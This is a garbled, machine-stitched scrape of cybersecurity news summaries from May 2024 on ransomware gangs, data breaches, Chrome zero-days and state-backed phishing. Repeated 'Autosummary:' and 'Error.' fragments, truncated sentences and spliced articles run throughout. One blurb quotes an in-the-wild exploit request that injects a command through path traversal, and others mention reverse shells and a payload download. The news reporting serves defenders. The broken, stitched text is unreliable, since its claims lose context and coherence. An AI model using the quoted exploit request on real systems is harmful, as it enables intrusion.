INC Ransom moving to a new site On May 1, 2024, INC Ransom announced on its old leak site that it would move to a new data leak extortion "blog" and shared a new TOR address, stating the old site would be closed in two to three months. "Autosummary:
"Autosummary:
Error. "Autosummary:
"Autosummary:
As of May 2024, Black Basta ransomware affiliates hacked over 500 organizations worldwide Pierluigi Paganini May 12, 2024 May 12, 2024 Black Basta ransomware affiliates have breached over 500 organizations between April 2022 and May 2024, FBI and CISA reported. "Autosummary:
The Pro-Russia group Killnet group launched multiple DDoS attacks against governments that expressed support for Ukraine, including Moldova, Italy, Romania, the Czech Republic, Lithuania, Norway, and Latvia. "Autosummary:
"Autosummary:
Error. "Autosummary:
"Autosummary:
"Autosummary:
Ohio Lottery data breach impacted over 538,000 individuals Pierluigi Paganini May 11, 2024 May 11, 2024 The cyber attack on the Ohio Lottery on Christmas Eve exposed the personal data of over 538,000 individuals. "Autosummary:
Its affiliates have since breached many high-profile victims, including German defense contractor Rheinmetall, Hyundai"s European division, U.K. technology outsourcing company Capita, industrial automation company and government contractor ABB, the Toronto Public Library, the American Dental Association, Sobeys, Knauf, and Yellow Pages Canada. "Cybercriminals are targeting the ever-increasing number of new vulnerabilities resulting from the exponential growth in the number and variety of connected devices and an explosion in new applications and online services, according to Fortinet. It’s only natural that attacks looking to exploit those vulnerabilities would rise as well. The latest semiannual report is a snapshot of the active threat landscape and highlights trends from July to December of 2023, including analysis on the speed with … More
The post Cybercriminals are getting faster at exploiting vulnerabilities appeared first on Help Net Security.
"Autosummary:
Botnets showed incredible resiliency, taking on average 85 days for command and control (C2) communications to cease after first detection: While bot traffic remained steady relative to the first half of 2023, FortiGuard Labs continued to see the more prominent botnets of the last few years, such as Gh0st, Mirai, and ZeroAccess, but three new botnets emerged in the second half of 2023, including: AndroxGh0st, Prometei, and DarkGate. "93% of security leaders said public GenAI was in use across their respective organizations, and 91% reported using GenAI specifically for cybersecurity operations, according to Splunk. A total of 1,650 security leaders participated in the global survey, with many reporting that cybersecurity has become easier to manage compared to past years. However, cybersecurity defenders now face a race against adversaries to harness GenAI. Organizations lack a clear GenAI policy According to the report, organizations have … More
The post GenAI enables cybersecurity leaders to hire more entry-level talent appeared first on Help Net Security.
"Autosummary:
“We are in an AI gold rush, with bad actors and security professionals both trying to seize the advantage,” said Patrick Coughlin, SVP, Global Technical Sales, Splunk. "Autosummary:
"Google has fixed a Chrome zero-day vulnerability (CVE-2024-4671), an exploit for which exists in the wild. About CVE-2024-4671 CVE-2024-4671 is a use after free vulnerability in the Visuals component that can be exploited by remote attackers to trigger an exploitable heap corruption via a specially crafted HTML page. “Successful exploitation of this vulnerability could allow for arbitrary code execution in the context of the logged on user. Depending on the privileges associated with the user … More
The post Google fixes Chrome zero-day with in-the-wild exploit (CVE-2024-4671) appeared first on Help Net Security.
"Autosummary:
"Autosummary:
"Autosummary:
The phishing URLs mimic the login pages of well-known services like Facebook, GitHub, Instagram, LinkedIn, Microsoft, Netflix, PayPal, Proton Mail, Snapchat, Tumblr, X, WordPress, and Yahoo. "Autosummary:
" Breach claimed by DragonForce ransomware While the Ohio Lottery didn"t reveal the nature of the incident, which affected mobile and prize-cashing operations, the DragonForce ransomware gang claimed the attack days later. "Autosummary:
Screenshot taken from the Breach Forums According to Menelik the data includes: The full name of the buyer or company name Address including postal code and country Unique seven digit service tag of the system Shipping date of the system Warranty plan Serial number Dell customer number Dell order number Most of the affected systems were sold in the US, China, India, Australia, and Canada. Users on Reddit reported getting an email from Dell which was apparently sent to customers whose information was accessed during this incident: “At this time, our investigation indicates limited types of customer information was accessed, including: Name Physical address Dell hardware and order information, including service tag, item description, date of order and related warranty information. Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
"Autosummary:
The adversarial collective, also known as APT37, InkySquid, RedEyes, Ricochet Chollima, and Ruby Sleet, is said to be aligned with North Korea"s Ministry of State Security (MSS) and tasked with covert intelligence gathering in support of the nation"s strategic military, political, and economic interests. "Autosummary:
Whether you"re a cybersecurity pro, an IT enthusiast, or simply intrigued by the future of cyber defense, this webinar is essential. "Autosummary:
Google fixes fifth actively exploited Chrome zero-day this year Pierluigi Paganini May 10, 2024 May 10, 2024 Since the start of the year, Google released an update to fix the fifth actively exploited zero-day vulnerability in the Chrome browser. "Autosummary:
The APT28 group (aka Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007 and it has targeted governments, militaries, and security organizations worldwide. The attack chain includes the download of a ZIP archive file from webhook[.]site, which contains: a Windows calculator with a changed name, e.g. IMG-238279780.jpg.exe , which pretends to be a photo and is used to trick the recipient into clicking on it, , which pretends to be a photo and is used to trick the recipient into clicking on it, script .bat "Autosummary:
Menelik says the stolen customer records include the following hardware breakdown: Monitors: 22,406,133 Alienware Notebooks: 447,315 Chromebooks: 198,713 Inspiron Notebooks: 11,257,567 Inspiron Desktops: 1,731,767 Latitude Laptops: 4,130,510 Optiplex: 5,177,626 Poweredge: 783,575 Precision Desktops: 798,018 Precision Notebooks: 486,244 Vostro Notebooks: 148,087 Vostro Desktops: 37,427 Xps Notebooks: 1,045,302 XPS/Alienware desktops: 399,695 The threat actors said they emailed Dell on April 12th and 14th to report the bug to their security team, sharing the email with BleepingComputer. This data breach contained customer order data, including warranty information, service tags, customer names, installed locations, customer numbers, and order numbers. "Autosummary:
Since then, its affiliates have breached many high-profile victims, including German defense contractor Rheinmetall, U.K. technology outsourcing company Capita, industrial automation company and government contractor ABB, and the Toronto Public Library. "Autosummary:
Although the research targeted the Cinterion EHS5-E series modem, because other products from the vendor have similar software and hardware architecture additional variants are also impacted: Cinterion BGS5 Cinterion EHS5/6/7 Cinterion PDS5/6/8 Cinterion ELS61/81 Cinterion PLS62 Telit fixed some of the disclosed vulnerabilities but some remain unpatched, Kaspersky told BleepingComputer. "Autosummary:
Other ransomware attacks we learned more about this week are: Contributors and those who provided new ransomware information and stories this week include: @billtoulas, @serghei, @fwosar, @LawrenceAbrams, @malwrhunterteam, @Seifreed, @Ionut_Ilascu, @BleepinComputer, @demonslay335, @snlyngaas, @pcrisk, @AJVicens, @chainalysis, @F_A_C_C_T_ , @zackwhittaker, @H4ckManac, and @JakubKroustek. May 6th 2024 A historic surge of ransomware incidents and payment totals in 2023 was not without resistance, as significant actions were taken against ransomware actors in 2023 and early 2024, including notable disruptions on Qakbot malware, and the LockBit and ALPHV-BlackCat ransomware-as-a-service (RaaS) groups. "Note: This joint Cybersecurity Advisory (CSA) is part of an ongoing #StopRansomware effort to publish advisories for network defenders that detail various ransomware variants and ransomware threat actors. These #StopRansomware advisories include recently and historically observed tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to help organizations protect against ransomware. Visit stopransomware.gov to see all #StopRansomware advisories and to learn more about other ransomware threats and no-cost resources.
The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.
This joint CSA provides TTPs and IOCs obtained from FBI investigations and third-party reporting. Black Basta is considered a ransomware-as-a-service (RaaS) variant and was first identified in April 2022. Black Basta affiliates have impacted a wide range of businesses and critical infrastructure in North America, Europe, and Australia. As of May 2024, Black Basta affiliates have impacted over 500 organizations globally.
Black Basta affiliates use common initial access techniques—such as phishing and exploiting known vulnerabilities—and then employ a double-extortion model, both encrypting systems and exfiltrating data. Ransom notes do not generally include an initial ransom demand or payment instructions. Instead, the notes provide victims with a unique code and instructs them to contact the ransomware group via a .onion
Autosummary:
According to cybersecurity researchers, Black Basta affiliates have also exploited ZeroLogon (CVE-2020-1472, [CWE-330]), NoPac (CVE-2021-42278 [CWE-20] and CVE-2021-42287 [CWE-269]), and PrintNightmare (CVE-2021-34527, [CWE-269]) vulnerabilities for local and Windows Active Domain privilege escalation [T1068].[1],[2] Exfiltration and Encryption Black Basta affiliates use RClone to facilitate data exfiltration prior to encryption. The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) (hereafter referred to as the authoring organizations) are releasing this joint CSA to provide information on Black Basta, a ransomware variant whose actors have encrypted and stolen data from at least 12 out of 16 critical infrastructure sectors, including the Healthcare and Public Health (HPH) Sector.SoftPerfect A network scanner ( netscan.exe ) used to ping computers, scan ports, discover shared folders, and retrieve information about network devices via Windows Management Instrumentation (WMI), Simple Network Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. "Autosummary:
"In the process of moving to the cloud, you need a security-first cloud migration strategy that considers both your security and compliance requirements upfront. In this article, we’ll discuss how you can use resources from the Center for Internet Security (CIS) to create such an approach. Security choices in the cloud To create a cloud security program, you have two main options to consider. As your first option, you can choose to manage the security … More
The post 3 CIS resources to help you drive your cloud cybersecurity appeared first on Help Net Security.
"Autosummary:
The CIS Critical Security Controls (CIS Controls) The CIS Controls consist of prescriptive, prioritized, and simplified security best practices that you can use to strengthen your cybersecurity posture across your environments, including in the cloud.The CIS Controls v8 Cloud Companion Guide provides context around how each Control applies not only to the cloud but also to individual service models, what your responsibility looks like for a Control within applicable service models, and what products, tools, and threat information (if any) you need to consider. CIS Build Kits and CIS-CAT The Benchmarks, including the Foundations Benchmarks and Cloud Service Category Benchmarks, are available in Word, Excel, and PDF formats. "Cybersecurity is a relatively new challenge for many IoT device makers who have traditionally produced non-connected devices. These devices were less vulnerable to exploitation and, as a result, manufacturers often lack the expertise and experience needed to effectively secure their connected products. IoT devices are built on a foundation of insecure software—a large portion of the open-source software and the chips used to build devices are poorly secured. Chipmakers are constantly getting caught sneaking hidden … More
The post Regulators are coming for IoT device security appeared first on Help Net Security.
"Autosummary:
While we do not yet know how aggressively regulators will enforce these new statutes, we recommend IoT manufacturers start investing in the following security features: Over-the-air (OTA) software update: The ability to update your device’s software is your escape hatch in the event a security issue is discovered after your device has shipped. Observability: Catching and fixing software bugs such as buffer overflows reinforces the security of your device, and monitoring via metrics can help you identify compromises (e.g., by spotting odd network usage patterns by a device).The device must be capable of identifying, logging, and reporting security events (e.g., compromises) to its manufacturer. "Ransomware and extortion incidents surged by 67% in 2023, according to NTT Security Holdings’ 2024 Global Threat Intelligence Report. Global ransomware crisis After a down year in 2022, ransomware and extortion incidents increased in 2023. More than 5,000 ransomware victims were detected or posted across multiple social channels, up from approximately 3,000 in 2022. The number of victims is likely higher because the research does not reflect incidents where ransoms were paid before the listing … More
The post Global ransomware crisis worsens appeared first on Help Net Security.
"Autosummary:
“Our 2023 report highlighted the increase in cyberthreats affecting day to day life, economic conditions, and privacy,” said Jeremy Nichols, NTT Security Holdings’ Global Threat Intelligence Center director. "Recent cyber incidents demonstrate the healthcare industry continues to be a prime target for ransomware hackers, according to Rubrik. New research by Rubrik Zero Labs reveals that ransomware attacks produce larger impacts against these healthcare targets. In fact, the report estimates that one fifth of all sensitive data belonging to healthcare organizations is impacted in each ransomware attack. “Despite the fallout of cyberattacks dominating headlines, data risk is an issue that continues to be murky … More
The post Ransomware attacks impact 20% of sensitive data in healthcare orgs appeared first on Help Net Security.
"Autosummary:
The research was conducted in the US, UK, France, Germany, Italy, Netherlands, Japan, Australia, Singapore, and India between January 18 and January 30, 2024.Of the external organizations victimized in a cyberattack in 2023, many were attacked across multiple aspects of their hybrid environment with 67% of attacks impacting SaaS data, 66% for the cloud, and 51% for on-premises locations. "Autosummary:
Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts.Phishing attacks often impersonate people or brands you know, and use themes that require urgent attention, such as missed deliveries, account suspensions, and security alerts. "Autosummary:
"Autosummary:
Name Physical address Dell hardware and order information, including service tag, item description, date of order, and related warranty information The company stresses that the stolen information does not include financial or payment information, email addresses, or telephone numbers and that they are working with law enforcement and a third-party forensics firm to investigate the incident. "Autosummary:
"Autosummary:
Below is the request employed in the attacks observed by the experts:, GET /api/v1/totp/user-backup-code/../../license/keys-status/{Any Command} “Others have observed instances in the wild where attackers have exploited this vulnerability using both curl and Python-based reverse shells, enabling them to take control of vulnerable systems. "Autosummary:
IntelBroker has offered to sell “confidential and highly critical logs packed with credentials”, including SMTP access, PAuth access, and SSL passkeys and certificates, for a total price of $20,000 in cryptocurrency. "Autosummary:
"Autosummary:
"Autosummary:
The step step involves the download of a ZIP archive file from webhook[.]site, which contains the Windows Calculator binary that masquerades as a JPG image file ("IMG-238279780.jpg.exe"), a hidden batch script file, and another hidden DLL file ("WindowsCodecs.dll"). "Autosummary:
"Autosummary:
According to evidence found by CSIRT MON, the country"s Computer Security Incident Response Team (led by the Polish Minister of National Defense) and CERT Polska (the Polish computer emergency response team), Russian APT28 state hackers attacked multiple government institutions in a large-scale phishing campaign. "Autosummary:
"We were made aware of the misuse of a monday.com feature named "Share Update," which allows users to share an update with someone who isn"t a member of their account," a Monday.com spokesperson told BleepingComputer. "Autosummary:
"Autosummary:
"In its State of Pentesting Report, Cobalt reveals an industry struggling to balance the use of AI and protecting against it, while facing significant resource and staffing constraints. Pentesting plays a key role in addressing this challenge, equipping organizations with the ability to more frequently security test critical assets, expanded environments, and proliferating cloud applications. Cobalt analyzed 4,068 pentests, revealing a 21% increase in the number of findings per pentest engagement year-over-year, aligning with increases … More
The post How workforce reductions affect cybersecurity postures appeared first on Help Net Security.
"Autosummary:
Cobalt analyzed 4,068 pentests, revealing a 21% increase in the number of findings per pentest engagement year-over-year, aligning with increases in Common Vulnerabilities and Exposures (CVE) records. "Sophos has released additional findings from its annual “State of Ransomware 2024” survey. According to the report, among organizations surveyed, 97% of those hit by ransomware over the past year engaged with law enforcement and/or official government bodies for help with the attack. In addition, 59% of those organizations that did engage with law enforcement found the process easy or somewhat easy. Only 10% of those surveyed said the process was very difficult. Based on … More
The post 97% of organizations hit by ransomware turn to law enforcement appeared first on Help Net Security.
"Autosummary:
“At the Bureau, we’ve been doubling down in particular on our work with the private sector, in their capacity as victims of cyberattacks, of course, because the mission of the FBI always has been—and always will be—victim-centric—but also as integral partners, who can share valuable information about threats and trends, and, increasingly, join in our operations themselves,“ said Christopher Wray, FBI director. "CISO Pinsent Masons | United Kingdom | Hybrid – View job details As a CISO, you will be responsible for the overall security posture of the organisation, ensuring the organisation’s information and technology assets are protected from internal and external threats. Cloud Security Architect Kyndryl | Israel | Hybrid – View job details As a Cloud Security Architect, you will conduct risk assessments and threat modeling to identify and prioritize risks to company’s business and … More
The post Cybersecurity jobs available right now: May 8, 2024 appeared first on Help Net Security.
"Autosummary:
Identity & Access Management Lead Invesco Asset Management | India | On-site – View job details Identity and Access Management Team Lead will be responsible for how we design, implement, and continually improve Identity Access Management, Privileged Access Management, Privileged Identity Management, and Identity Governance Administration used across external and internal facing applications, products, services and backend technologies. Cyber Security Engineer 4 Pacific Northwest National Laboratory | USA | On-site – View job details As Cyber Security Engineer 4, you will design, deploy, and operate systems, networks, applications, and tools that support cybersecurity and cyber defense. Senior Full-Stack Engineer – Security Mercury | USA | Remote – View job details As a Security Engineer at Mercury, you will address key security features within the product, such as developing passkey support, enhancing the security dashboard, refining user-facing audit logs, and implementing SAML. "Autosummary:
This includes Amadey, Lumma Stealer (aka LummaC2), Meta Stealer, Racoon Stealer V2, Remcos RAT, and Rhadamanthys. "Autosummary:
LiteSpeed Cache has over 5 million active installations, with statistics showing that versions other than 5.7, 6.0, 6.1, and 6.2 are still active on 16.8% of all websites. "Autosummary:
UK Ministry of Defense disclosed a third-party data breach exposing military personnel data Pierluigi Paganini May 08, 2024 May 08, 2024 The UK Ministry of Defense disclosed a data breach at a third-party payroll system that exposed data of armed forces personnel and veterans. "Autosummary:
As reported by the BBC, Lloyds Bank estimates that fans have lost an estimated £1m ($1.25 m) in ticket scams ahead of the UK leg of Taylor Swift’s Eras tour. "Autosummary:
LiteSpeed Cache WordPress plugin actively exploited in the wild Pierluigi Paganini May 08, 2024 May 08, 2024 Threat actors are exploiting a high-severity vulnerability in the LiteSpeed Cache plugin for WordPress to take over web sites. "Autosummary:
Error. "Autosummary:
Public services, including golf courses, parks, courts, and the water district, require residents to pay in cash or by check while online payment platforms are shut down. "Autosummary:
"On Wednesday, May 8, we detected unusual activity on select technology network systems, which we now believe is due to a cyber security event," Ascension said. "Autosummary:
In November, F5 warned customers that "skilled" attackers were exploiting two critical BIG-IP vulnerabilities (CVE-2023-46747 and CVE-2023-46748) fixed one month before to hack into unpatched devices, executing malicious code and erasing signs of the breach. "Autosummary:
Hosts: Graham Cluley – @gcluley Carole Theriault – @caroletheriault Guest: Allan Liska – @uuallan Episode links: Sponsored by: Kiteworks – Step into the future of secure managed file transfer with Kiteworks. "Autosummary:
LockBit gang claimed responsibility for the attack on City of Wichita Pierluigi Paganini May 08, 2024 May 08, 2024 The LockBit ransomware group has added the City of Wichita to its Tor leak site and threatened to publish stolen data. "Despite significant disruptions for high-profile ransomware gangs LockBit and BlackCat, Q1 2024 became the most active first quarter ever recorded — a 21% increase over Q1 2023, according to Corvus Insurance. In January, Corvus reported that global ransomware attacks in 2023 set a record high, surpassing 2022 by close to 70%. The Q1 Ransomware Report shows that 2024 is picking up right where 2023 left off. According to the data, 1,075 leak site ransomware victims … More
The post Ransomware activity is back on track despite law enforcement efforts appeared first on Help Net Security.
"Autosummary:
According to the data, 1,075 leak site ransomware victims were posted on leak sites during the first quarter of 2024, despite the disruption of two major ransomware groups, LockBit and ALPHV/BlackCat, which accounted for 22% and 8% of the activity, respectively. "As the number of real (and fake) victims of ransomware gangs continues to rise, the number of ransomware payments is falling, along with the average ransom payment. The reasons behind this decrease are many: increased cyber resilience of organizations (which includes having recoverable backups), the availability of decryptors created by law enforcement and cybersecurity companies, more frequent law enforcement actions, and so on. “Despite the surge in attacks in 2023, ransomware attacks involving payments decreased … More
The post Ransomware operations are becoming less profitable appeared first on Help Net Security.
"Autosummary:
“Innovative disruption strategies involving a whole-of-government approach targeting every part of the cybercriminal ecosystem — from the infrastructure, to the laundering mechanisms, to arrests, sanctions, and asset seizures, along with the use of blockchain intelligence tools, are essential for understanding and counteracting the affiliates’ adaptation mechanisms.” "Sumo Logic announced new AI and security analytics capabilities that allow security and development teams to align around a single source of truth and collect and act on data insights more quickly. These advancements, bolstered by Sumo Logic’s free data ingest licensing, empower customers to use their critical security data to close security gaps and better fuel DevSecOps. A recent Cloud Security Alliance survey found that only 30% of respondents believe they have good collaboration … More
The post Sumo Logic’s analytics capabilities allow security teams to find insights within their data appeared first on Help Net Security.
"Autosummary:
“We’re excited to deliver new security innovations leveraging AI and deeper threat intelligence, all wrapped around our new Flex Licensing model – removing the economic and collaboration barriers by ingesting, storing and analyzing all security log events in the Sumo Logic SaaS Log Analytics Platform, so Dev, Sec and Ops teams have a single place to monitor and secure their apps and infrastructure,” added Kim. New capabilities include: New integrated threat intelligence : By integrating an out-of-the-box threat intelligence feed and third-party feeds with security log data, Sumo Logic is strengthening security postures and providing earlier threat detection. "Autosummary:
"Autosummary:
Alexander Vinnik, the operator of BTC-e exchange, pleaded guilty to money laundering Pierluigi Paganini May 07, 2024 May 07, 2024 Alexander Vinnik, a Russian operator of virtual currency exchange BTC-e pleaded guilty to participating in a money laundering scheme. The virtual currency exchange received criminal proceeds from various illegal activities, including computer intrusions, ransomware attacks, identity theft, corruption, and drug distribution. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Between June 2022 and February 2024, law enforcement claims that the ransomware operation conducted over 7,000 attacks, with the top five countries hit being the US, the UK, France, Germany, and China. "Russian national Dmitry Khoroshev is “LockBitSupp”, the creator, developer and administator of the infamous LockBit ransomware group, according to UK, US and Australia law enforcement agencies. The US Justice Deparment has unsealed charges against Khoroshev and the US Department of the Treasury’s Office of Foreign Assets Control (OFAC), the Australian Department of Foreign Affairs, and the UK Foreign, Commonwealth and Development Office have imposed sanctions on him. Taking LockBit down In February 2024, the UK … More
The post LockBit leader unmasked: US charges Russian national appeared first on Help Net Security.
"Autosummary:
With the help of affiliates, the LockBit ransomware group attacked more than 2,500 victims – individuals, businesses, hospitals, critical infrastructure organizations, government agencies, etc. – in 120+ countries, and “extracted at least $500 million in ransom payments from their victims and caused billions of dollars in broader losses, such as lost revenue, incident response, and recovery.” "Autosummary:
"LockBit ransomware has been used against Australian, UK and US businesses, comprising 18% of total reported Australian ransomware incidents in 2022-23 and 119 reported victims in Australia," Penny Wong, Minister for Foreign Affairs of Australia, said. "Autosummary:
"Autosummary:
Targeting Email Subscribers plugin The ability to create admin accounts on WordPress sites gives attackers full control over the website, allowing them to modify content, install plugins, change critical settings, redirect traffic to unsafe sites, distribute malware, phishing, or steal available user data. "Autosummary:
The UK defense secretary clarified that the hackers targeted an external system managed by a contractor that was “completely separate” from MoD’s core network, and had no connection to the “main military HR system.” "Autosummary:
Law enforcement agencies identified LockBit ransomware admin and sanctioned him Pierluigi Paganini May 07, 2024 May 07, 2024 The FBI, UK National Crime Agency, and Europol revealed the identity of the admin of the LockBit operation and sanctioned him. The US government also charged in the past other five LockBit members, Artur Sungatov, Ivan Kondratyev (Bassterlord), Ruslan Magomedovich Astamirov, Mikhail Matveev (Wazawaka), and Mikhail Vasiliev. "Autosummary:
"Autosummary:
"Autosummary:
Error. "As organizations increasingly adopt AI, they face unique challenges in updating AI models to keep pace with evolving threats while ensuring seamless integration into existing cybersecurity frameworks. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity. What are organizations’ main challenges when integrating AI into their cybersecurity infrastructures? Companies are like organisms: constantly changing every second. Given the dynamic nature of companies, keeping AI models … More
The post Strategies for preventing AI misuse in cybersecurity appeared first on Help Net Security.
"Autosummary:
Employing a layered security approach, including encryption, behavior monitoring, and automatic alerts for unusual activities, helps strengthen defenses. In this Help Net Security interview, Pukar Hamal, CEO at SecurityPal, discusses the integration of AI tools in cybersecurity. "The Certified Information Systems Security Professional (CISSP) is the most widely recognized certification in the information security industry. CISSP certifies that an information security professional possesses extensive technical and managerial expertise for designing, engineering, and managing an organization’s security stance. In this article, CISSP-certified cybersecurity leaders provide practical tips and strategies to help candidates navigate the extensive study requirements and effectively manage their CISSP exam prep time. Whether you’re just starting your study journey or … More
The post How to prepare for the CISSP exam: Tips from industry leaders appeared first on Help Net Security.
"Autosummary:
Even though I had over five years of experience in cybersecurity and over ten years in IT, my practical knowledge was only in specific domains (i.e. Security and Risk Management, Asset Security, Communications and Network Security, etc.). Looking back at the exam itself, I believe that having a strong knowledge foundation, coupled with real-life experience, and a network of colleagues you can always turn to and discuss certain topics you are less familiar with, is the key to success in passing the CISSP exam.Now, this may all sound easy, but the truth is that by the time I decided to pursue the CISSP, I already had 13 years of experience, numerous other industry certifications, and had been deeply involved in the cybersecurity field since the day I graduated; my Master’s thesis was also in cybersecurity. Ryan Williams Sr., IT Security Analyst, Buddobot Here’s how I effectively studied for the CISSP certification, relying solely on comprehensive study materials rather than quick-fix dumps or quizlets. Shannon Brewster, Executive Director, General Manager, AT&T Cybersecurity Passing the CISSP exam is an ambitious goal, especially if you hope to pass on your first attempt. Andrea Szeiler-Zengo, President of the Women4Cyber Hungarian Chapter When I decided to get CISSP certified, I signed up for local training, but honestly, I learned more independently than in class. This structured approach to studying for the CISSP took approximately 6 months, using a mix of reading, practical exercises, and motivational content, equipped me with the knowledge and confidence to successfully pass the exam. "Autosummary:
Error. "Autosummary:
Finland authorities warn of Android malware campaign targeting bank users Pierluigi Paganini May 06, 2024 May 06, 2024 Finland’s Transport and Communications Agency (Traficom) warned about an ongoing Android malware campaign targeting bank accounts.Once installed, the malware grants access to the victim’s applications and messages, including online banking, allowing crooks to steal funds from the victim’s online bank. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
And the Certified Information Systems Security Professional (CISSP) course looks at what it takes to design, launch, and maintain advanced cybersecurity initiatives. "Autosummary:
Revised LockBit dark web data leak site Source: BleepingComputer These blog posts tease titles like "What have we learnt?," "More LB hackers exposed," "What have we been doing?," and what many hope to be the coup de grâce on the diminished ransomware operation, another blog post titled "Who is LockBitSupp?". "Autosummary:
A majority of the infections have been detected in Nigeria, India, China, Iran, Indonesia, the U.K., Iraq, the U.S., Pakistan, and Ethiopia. "Autosummary:
EDR solutions can detect, investigate, and mitigate potential threats across individual endpoints, such as computers, laptops, and mobile devices.Unfortunately, many SMBs end up learning one lesson the hard way: cyberattack recovery costs can be significantly higher than the initial investment required for an effective cybersecurity solution Many SMBs Aren"t Prepared for the Inevitable In our report, The State of Cybersecurity for Mid-Sized Businesses in 2023, we discovered that nearly 25% of SMBs have either suffered a cyberattack or didn"t even realize they had suffered one in the past 12 months.There"s More at Stake Than Just Money Today, it"s commonplace to find budgets being slashed, leaving cybersecurity staff overextended, overworked, or nonexistent. "Autosummary:
City of Wichita hit by a ransomware attack Pierluigi Paganini May 06, 2024 May 06, 2024 The City of Wichita in Kansas was forced to shut down its computer systems after a ransomware attack. "Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
"Autosummary:
Attack overview Source: Traficom Vultur trojan suspected Although the authorities in Finland haven"t determined the type of malware and have not shared any hashes or IDs for the APK files, the attacks resemble those Fox-IT analysts recently reported in connection to a new version of the Vultur trojan. "Autosummary:
Ransomware drama: Law enforcement seized Lockbit group’s website again Pierluigi Paganini May 05, 2024 May 05, 2024 Law enforcement seized the Lockbit group’s Tor website again and announced they will reveal more identities of its operators Law enforcement seized the Lockbit group’s Tor website again. Lockbit also said and quote: "I don"t understand why they"re… — vx-underground (@vxunderground) May 5, 2024 In February, a joint law enforcement action, code-named Operation Cronos, conducted by law enforcement agencies from 11 countries disrupted the LockBit ransomware operation. "Autosummary:
Russian state-sponsored cyber threat activity – data theft, destructive attacks, DDoS campaigns, and influence operations – is also expected to pose a severe risk to elections in regions like the U.S., the U.K., and the E.U. from multiple groups such as APT44 (aka Sandworm), COLDRIVER, KillNet, APT29, and APT28, per an assessment released by Google Cloud subsidiary Mandiant last week. "Autosummary:
Error. "Autosummary:
One of the fake personas created by APT42 Source: Google The media organizations impersonated by APT42 include the Washington Post (U.S.), The Economist (UK), The Jerusalem Post (IL), Khaleej Times (UAE), Azadliq (Azerbaijan), with Mandiant stating that the attacks often use typosquatted domains like "washinqtonpost[.]press". "Autosummary:
Error. "Autosummary:
Error. "Autosummary:
"Autosummary:
"Businesses worldwide have faced a rate of change in the threat environment evidenced by 95% of companies reporting cybersecurity strategy adjustments within just the past year, according to LogRhythm. Strategic shifts within organizations At the heart of these strategic shifts is the central role of leadership within organizations. The perception of cybersecurity has changed from a purely technical issue to a central pillar of business strategy and corporate governance, with 78% stating that the cybersecurity … More
The post Most companies changed their cybersecurity strategy in the past year appeared first on Help Net Security.
"Autosummary:
The research found that less than half of security teams are reporting on time to respond (49%), time to detect (48%), and time to recover (45%). "Cybersecurity mesh architecture (CSMA) is a set of organizing principles used to create an effective security framework. Using a CSMA approach means designing a security architecture that is composable and scalable with easily extensible interfaces, a common data schema and well-defined interfaces and APIs for interoperability. A well-designed CSMA allows various security controls and solutions to work together more effectively. In turn, this allows security organizations to be better handle threat intelligence, incident response, security … More
The post What is cybersecurity mesh architecture (CSMA)? appeared first on Help Net Security.
"Autosummary:
The detection mesh web spans various components and layers of an organization’s IT environment, including endpoints and devices, APIs, infrastructure (cloud, on-prem, hybrid), applications and SaaS, networks, data flows and storage, and authentication and authorization systems. Process measurements can be constructed around known metrics (time-to-remediate, etc) or alternative metrics focused on process (adherence to security playbooks, time-spent out of compliance, time-to-triage).In turn, this allows security organizations to be better handle threat intelligence, incident response, security asset management, and other core functions of modern cybersecurity. "Autosummary:
"Orum launched No Code Verify, which helps businesses and institutions determine whether a bank account is open and valid before initiating payments — all without integrating an API. Orum’s Verify solution offers 100% coverage of all US-based consumer and business bank accounts — a meaningful step forward in an industry still plagued by invalid credentials, friction, and fraud. The new technology, launched in October 2023, makes it easy for businesses and banks to verify the … More
The post Orum No Code Verify helps businesses validate bank accounts appeared first on Help Net Security.
"Autosummary:
Orum’s No Code Verify: Validates account status instantly, determining whether a bank account is open, valid, and able to receive payments – fulfilling Nacha requirements. "Google has drastically increased the rewards bug hunters can get for reporting vulnerabilities in Android apps it develops and maintains. “We increased reward amounts by up to 10x in some categories (for example Remote Arbitrary Code Execution in a Tier 1 app went from $30,000 to $300,000),” Google information security engineer Kristoffer Blasiak has pointed out. Google is also ready to pay more for high-quality reports, so that the Mobile Vulnerability Reward Program team can … More
The post Bug hunters can get up to $450,000 for an RCE in Google’s Android apps appeared first on Help Net Security.
"Autosummary:
The apps are categorized in three tiers: Tier 1 includes Google Play Services, Android Google Search App (AGSA), Google Cloud, and Gmail includes Google Play Services, Android Google Search App (AGSA), Google Cloud, and Gmail Tier 2 includes apps that interact with either a Tier 1 application, user data, or Google’s services includes apps that interact with either a Tier 1 application, user data, or Google’s services Tier 3 includes apps that don’t handle user data or interact with Google’s services After these latest changes, a bug in a Tier 1 app that can lead to arbitrary code execution and can be triggered remotely and without user interaction can get its discoverer $300,000. "BlackBerry introduced the new and expanded CylanceMDR, offering comprehensive Managed Detection & Response (MDR) protection powered by the Cylance AI platform and augmented with award-winning security operations center analysts for 24×7 threat coverage. CylanceMDR (formerly CylanceGUARD) now offers three new packages – Standard, Advanced, and On-Demand. Each package is designed to address the unique cybersecurity challenges businesses face today, from AI detection to expert support, providing a comprehensive solution for all. “CylanceMDR offers more than … More
The post BlackBerry CylanceMDR improves cybersecurity defensive strategy appeared first on Help Net Security.
"Autosummary:
